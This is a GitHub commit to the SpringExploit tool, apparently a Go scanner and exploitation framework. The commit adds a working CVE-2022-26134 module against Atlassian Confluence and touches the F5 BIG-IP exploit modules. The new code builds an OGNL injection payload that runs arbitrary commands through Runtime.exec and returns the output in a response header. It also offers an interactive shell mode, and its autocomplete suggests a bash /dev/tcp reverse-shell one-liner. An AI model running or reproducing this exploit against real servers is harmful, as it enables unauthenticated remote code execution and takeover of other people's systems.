🚂 增加CVE-2022-26134 && 修改部分代码

SummerSec · Jun 4, 2022 · aeb69fa · aeb69fa
1 parent 3b32cb6
commit aeb69fa
Show file tree

Hide file tree

Showing 18 changed files with 445 additions and 90 deletions.
diff --git a/README.md b/README.md
@@ -20,6 +20,7 @@
 * [x] 添加支持CVE-2022-22947 (Spring Cloud Gateway SpELRCE)
 * [x] 添加支持CVE-2022-22963 (Spring Cloud Function SpEL RCE)
 * [x] 添加支持CVE-2021-26084 (Atlassian Confluence RCE)
+* [x] 添加支持CVE-2022-26134 (Atlassian Confluence Unauth RCE)
 * [x] 添加支持CVE-2022-22965 (Spring Core RCE)
 * [x] 添加支持CVE-2022-1388 (F5 BIG-IP RCE)
 * [x] 自定义并发

diff --git a/cmd/commons/attack/Pocslist.go b/cmd/commons/attack/Pocslist.go
@@ -7,6 +7,7 @@ const (
 
 	// 2022年list
 
+	CVE202226134 string = "CVE202226134"
 	CVE202222963 string = "CVE202222963"
 	CVE202222965 string = "CVE202222965"
 	CVE202222947 string = "CVE202222947"
@@ -24,6 +25,7 @@ func GetList() *list.List {
 	l.PushBack(ISAlIVEURL)
 
 	// 2022年漏洞
+	l.PushBack(CVE202226134)
 	l.PushBack(CVE202222963)
 	l.PushBack(CVE202222965)
 	l.PushBack(CVE202222947)

diff --git a/cmd/commons/attack/attack.go b/cmd/commons/attack/attack.go
@@ -34,6 +34,7 @@ func addPoc(pocs map[string]interface{}) map[string]interface{} {
 
 	// TODO 添加 2022 poc
 	//pocs["demo"] = &poc.Demo{}
+	pocs["CVE202226134"] = &_022.CVE202226134{}
 	pocs["CVE202222947"] = &_022.CVE202222947{}
 	pocs["CVE202222963"] = &_022.CVE202222963{}
 	pocs["CVE202222965"] = &_022.CVE202222965{}

diff --git a/cmd/commons/core/options.go b/cmd/commons/core/options.go
@@ -68,7 +68,7 @@ func ParseOptions() *Options {
 	flag.BoolVar(&options.Verbose, "verbose", false, "show verbose")
 	flag.BoolVar(&options.SP, "sp", false, "show pocs list")
 	flag.StringVar(&options.LogFile, "log", "", "log file example: -log=/logs/logs.txt")
-	flag.IntVar(&options.Retry, "retry", 3, "repeat request times")
+	flag.IntVar(&options.Retry, "retry", 1, "repeat request times")
 	//flag.StringVar(&options.IP, "i", "", "ip segment example: -ip=192.168.0.1/24 ")
 	flag.IntVar(&options.Timeout, "timeout", 10, "timeout")
 	flag.StringVar(&options.Out, "o", "result.txt", "out file example: -o=result.txt default result.txt")

diff --git a/cmd/commons/poc/2021/CVE-2021-22986.go b/cmd/commons/poc/2021/CVE-2021-22986.go
@@ -45,7 +45,7 @@ func (t CVE202122986) SendPoc(target string, hashmap map[string]interface{}) {
 
 	randstr := utils.GetCode(10)
 	log.Debugf("[+] randstr: %s", randstr)
-	base64str := utils.EncodeString(randstr)
+	base64str := utils.EncodeBase64String(randstr)
 	log.Debugf("[+] base64str: %s", base64str)
 
 	reqmap["body"] = "{\"command\":\"run\",\"utilCmdArgs\":\"-c 'echo " + base64str + " | base64 -d'\"}"
@@ -76,7 +76,7 @@ func (t CVE202122986) SendPoc(target string, hashmap map[string]interface{}) {
 			log.Errorf("[-] Unmarshal error: %s", err)
 			return
 		}
-		log.Info("命令执行结果: " + utils.DecodeString(txtmap["commandResult"].(string)))
+		log.Info("命令执行结果: " + utils.DecodeBase64String(txtmap["commandResult"].(string)))
 		log.Info("[+] End CVE-2021-22986 shell")
 	}
 

diff --git a/cmd/commons/poc/2022/CVE-2022-1388.go b/cmd/commons/poc/2022/CVE-2022-1388.go
@@ -44,7 +44,7 @@ func (t CVE20221388) SendPoc(target string, hashmap map[string]interface{}) {
 
 	randstr := utils.GetCode(10)
 	log.Debugf("[+] randstr: %s", randstr)
-	base64str := utils.EncodeString(randstr)
+	base64str := utils.EncodeBase64String(randstr)
 	log.Debugf("[+] base64str: %s", base64str)
 
 	reqmap["body"] = "{\"command\":\"run\",\"utilCmdArgs\":\"-c 'echo " + base64str + " | base64 -d'\"}"
@@ -75,7 +75,7 @@ func (t CVE20221388) SendPoc(target string, hashmap map[string]interface{}) {
 			log.Errorf("[-] Unmarshal error: %s", err)
 			return
 		}
-		log.Info("命令执行结果: " + utils.DecodeString(txtmap["commandResult"].(string)))
+		log.Info("命令执行结果: " + utils.DecodeBase64String(txtmap["commandResult"].(string)))
 		log.Info("[+] End CVE-2022-1388 shell")
 	}
 

diff --git a/cmd/commons/poc/2022/CVE-2022-22947.go b/cmd/commons/poc/2022/CVE-2022-22947.go
@@ -120,7 +120,7 @@ func (CVE202222947) init() {
 
 }
 
-// 检查是否成功
+// CheckExp 检查是否成功
 func (p CVE202222947) CheckExp(resp *req.Response, url string, hashmap map[string]interface{}) bool {
 	defer func() {
 		if err := recover(); err != nil {
@@ -130,7 +130,7 @@ func (p CVE202222947) CheckExp(resp *req.Response, url string, hashmap map[strin
 	log.Debug(resp)
 	res := resp.Dump()
 	file := hashmap["Out"].(string)
-	y := utils.EncodeString("route_id")
+	y := utils.EncodeBase64String("route_id")
 
 	log.Debugf("[+] res:%s", res)
 	if strings.Contains(res, "route_id") {

diff --git a/cmd/commons/poc/2022/CVE-2022-26134.go b/cmd/commons/poc/2022/CVE-2022-26134.go
@@ -0,0 +1,89 @@
+package _022
+
+import (
+	"fmt"
+	req2 "github.com/SummerSec/SpringExploit/cmd/commons/req"
+	resp2 "github.com/SummerSec/SpringExploit/cmd/commons/resp"
+	"github.com/SummerSec/SpringExploit/cmd/commons/utils"
+	"github.com/c-bata/go-prompt"
+	"github.com/imroc/req/v3"
+	log "github.com/sirupsen/logrus"
+)
+
+type CVE202226134 struct{}
+
+func (t CVE202226134) SendPoc(target string, hashmap map[string]interface{}) {
+
+	reqmap := req2.NewReqInfoToMap(hashmap)
+	reqmap["method"] = "GET"
+	headers := map[string]string{
+		"User-Agent":      utils.GetUA(),
+		"Accept":          "*/*",
+		"Accept-Encoding": "gzip, deflate",
+	}
+	reqmap["headers"] = headers
+
+	randStr := utils.GetCode(10)
+	cmd := "echo " + randStr
+	//cmd := "echo%20" + randStr + "%7c%62%61%73%65%36%34%20%2d%64"
+	//cmd = "ifconfig"
+	if hashmap["Shell"].(bool) {
+		log.Info("[+] Start CVE-2022-26134 Shell Mode")
+		th := prompt.Input("[+] Please input command: ", t.completer)
+		if th == "" {
+			th = "whoami"
+		}
+		cmd = th
+	}
+	payload := fmt.Sprintf("${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec(\"%s\").getInputStream(),\"utf-8\")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(\"X-Cmd-Response\",#a))}", cmd)
+	payload, _ = req2.Encode(payload, "utf8")
+	target1 := target + payload + "/"
+
+	//log.Debug("[+] Target: ", target)
+	reqmap["url"] = target1
+
+	resp := utils.Send(reqmap)
+
+	res := resp2.HandlerRespHeader(resp, "X-Cmd-Response")
+	if t.CheckExp(resp, target1, hashmap) {
+		if res != "" {
+			//res = utils.DecodeBase64String(res)
+			log.Infof("[+] Success CVE-2022-26134 %s", target)
+			if hashmap["Shell"].(bool) {
+				log.Infof("[+] 命令执行结果: %s", res)
+				log.Info("[+] End CVE-2022-26134 shell")
+			} else {
+				result := fmt.Sprintf(" %s 存在 CVE-2022-26134 漏洞, 可以使用 SpringExploit -u %s -p CVE202226134 -shell 进入交互式执行命令", target1, target1)
+				t.SaveResult(result, hashmap["Out"].(string))
+			}
+		}
+	}
+
+}
+
+func (CVE202226134) SaveResult(target string, file string) {
+	log.Info(target)
+	err := utils.SaveToFile(target, file)
+	if err != nil {
+		log.Debugf("[-] Save result error: %s %s", target, err)
+		return
+	}
+}
+
+func (CVE202226134) CheckExp(resp *req.Response, target string, hashmap map[string]interface{}) bool {
+
+	if !resp.IsSuccess() {
+		return true
+	} else {
+		return false
+	}
+
+}
+
+func (t CVE202226134) completer(d prompt.Document) []prompt.Suggest {
+	s := []prompt.Suggest{
+		{Text: "id", Description: "you can type command {id}"},
+		{Text: "bash", Description: "you can type command bash -c $@|bash 0 echo bash -i >& /dev/tcp/127.0.0.1/8090 0>&1"},
+	}
+	return prompt.FilterHasPrefix(s, d.GetWordBeforeCursor(), true)
+}
diff --git a/cmd/commons/req/request.go b/cmd/commons/req/request.go
@@ -1,6 +1,8 @@
 package req
 
-import "github.com/fatih/structs"
+import (
+	"github.com/fatih/structs"
+)
 
 type ReqInfo struct {
 	Method   string
@@ -134,3 +136,72 @@ func NewReqInfoToMap(hashmap map[string]interface{}) map[string]interface{} {
 
 	return reqmap
 }
+
+//// UrlEncode 将传入的url进行url编码
+//func UrlEncode(target string) string {
+//
+//	// 对传入的字符串进行UrlEncode
+//
+//	target = escape(target)
+//
+//	return target
+//
+//}
+//
+//const upperhex = "0123456789ABCDEF"
+//
+//func escape(s string, ) string {
+//	spaceCount, hexCount := 0, 0
+//	for i := 0; i < len(s); i++ {
+//		c := s[i]
+//
+//		if c == ' ' {
+//			spaceCount++
+//		} else {
+//			hexCount++
+//		}
+//
+//	}
+//
+//	if spaceCount == 0 && hexCount == 0 {
+//		return s
+//	}
+//
+//	var buf [64]byte
+//	var t []byte
+//
+//	required := len(s) + 2*hexCount
+//	if required <= len(buf) {
+//		t = buf[:required]
+//	} else {
+//		t = make([]byte, required)
+//	}
+//
+//	if hexCount == 0 {
+//		copy(t, s)
+//		for i := 0; i < len(s); i++ {
+//			if s[i] == ' ' {
+//				t[i] = '+'
+//			}
+//		}
+//		return string(t)
+//	}
+//
+//	j := 0
+//	for i := 0; i < len(s); i++ {
+//		switch c := s[i]; {
+//		case c == ' ':
+//			t[j] = '+'
+//			j++
+//		case true:
+//			t[j] = '%'
+//			t[j+1] = upperhex[c>>4]
+//			t[j+2] = upperhex[c&15]
+//			j += 3
+//		default:
+//			t[j] = s[i]
+//			j++
+//		}
+//	}
+//	return string(t)
+//}